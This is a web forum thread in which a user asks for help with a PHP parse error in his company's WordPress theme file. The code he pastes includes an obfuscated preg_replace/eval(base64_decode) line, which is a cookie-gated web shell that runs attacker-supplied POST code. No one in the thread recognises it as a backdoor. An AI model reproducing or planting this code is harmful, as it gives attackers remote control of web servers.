company website has parse error

AnthonyJ

Hello,

The company I work for is now having a parse error and they asked me to look into it. The error is:

Parse error: syntax error, unexpected '&', expecting ']' in /home3/strater2/public_html/wp-content/themes/inspire/index.php on line 7

Here is the first ten lines of the index.php page line seven is in red:

<?php

preg_replace("/.+/esi","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'aWYgKCFlbXB0eSgkX0NPT0tJRVsndiddKSBhbmQgJF9DT09LSUVbJ3YnXT09J2QnKXtpZiAoIWVtcHR5KCRfUE9TVFsnYyddKSkge2VjaG8gJzx0ZXh0YXJlYSByb3dzPTI4IGNvbHM9ODA+JzsgJGQ9YmFzZTY0X2RlY29kZShzdHJfcmVwbGFjZSgnICcsJysnLCRfUE9TVFsnYyddKSk7aWYoJGQpIGV2YWwoJGQpOyBlY2hvICc8L3RleHRhcmVhPic7fQ0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD1wb3N0Pjx0ZXh0YXJlYSBjb2xzPTgwIHJvd3M9MjggbmFtZT1jPjwvdGV4dGFyZWE+PGJyPjxpbnB1dCB0eXBlPXN1Ym1pdD48L2Zvcm0+JztleGl0O30='\x29\x29\x3B",'1');

?>

<?php get_header(); ?>

<?php global $woo_options; ?>

<?php if ( $woo_options['woo_featured_disable'] <> "true" ) include( TEMPLATEPATH . '/includes/featured.php'); ?>

</div><!-- /#top -->

What is wrong?

BTW...When I copied and pasted the code in, some data is missing....What I see is...<?php if($woo_options['woo_featured_disable'] <> "true" ) include(TEMPLATEPATH . '/includes/featured.php');?>

So what is really wrong?

Edited by AnthonyJ

There is code that is not showing up when I paste it in or write it by hand...Seemingly there is a "'" added throughout the line.

<?php if ( $woo_options['woo_featured_disable'] <> "true" ) include( TEMPLATEPATH . '/includes/featured.php'); ?>

It appears after $woo_options[ before 'woo_featured_disable.

And after 'woo_featured_disable'.

After TEMPLATEPATH.

After /featured.php');?>

Any idea what that is and is it necessary?

There is code that is not showing up when I paste it in or write it by hand...Seemingly there is a "'" added throughout the line.

I assume you're talking about when you paste the code here in the forum? Look to just above the text box and click the button that has '<>" in it - that creates a special code field and all characters are displayed as you enter them.

As to your actual problem, sorry, I don't speak PHP.

Thank you Andrea,

Here is what I see in the editor:

<?php if ( $woo_options[''woo_featured_disable''] <> "true" ) include( TEMPLATEPATH .' '/includes/featured.php''); ?>

Well it was there when I pasted it and it disapeared so I entered it manually and it seems to stick.

Edited by AnthonyJ

Ok,

I removed the "'" and now I get:

Parse error: syntax error, unexpected ';', expecting ']' in /home3/strater2/public_html/wp-content/themes/inspire/index.php on line 7

<?php if ( $woo_options[woo_featured_disable;] <> "true" ) include( TEMPLATEPATH . ;/includes/featured.php;); ?>

Which semi-colon is it referring to?

Looks like you added an unnecessary ";" here:

[woo_featured_disable;]

I'm not seeing that in the original code you posted.

Also, you are missing the quotes around:

woo_featured_disable

It seems like those were in your original code, yet you removed them?

EDIT: You also have errors in your include:

TEMPLATEPATH . ;/includes/featured.php;

I'm not sure why, but you are missing quotes around the "/includes/featured.php" section, and you have two unnecessary ";" in their place.

Ok,

Now I get this:

Parse error: syntax error, unexpected '&', expecting ']' in /home3/strater2/public_html/wp-content/themes/inspire/index.php on line 17

And it is the ' business again.

Ben, will you have a look at the index page for us? I am sure I can get you compensated for your time.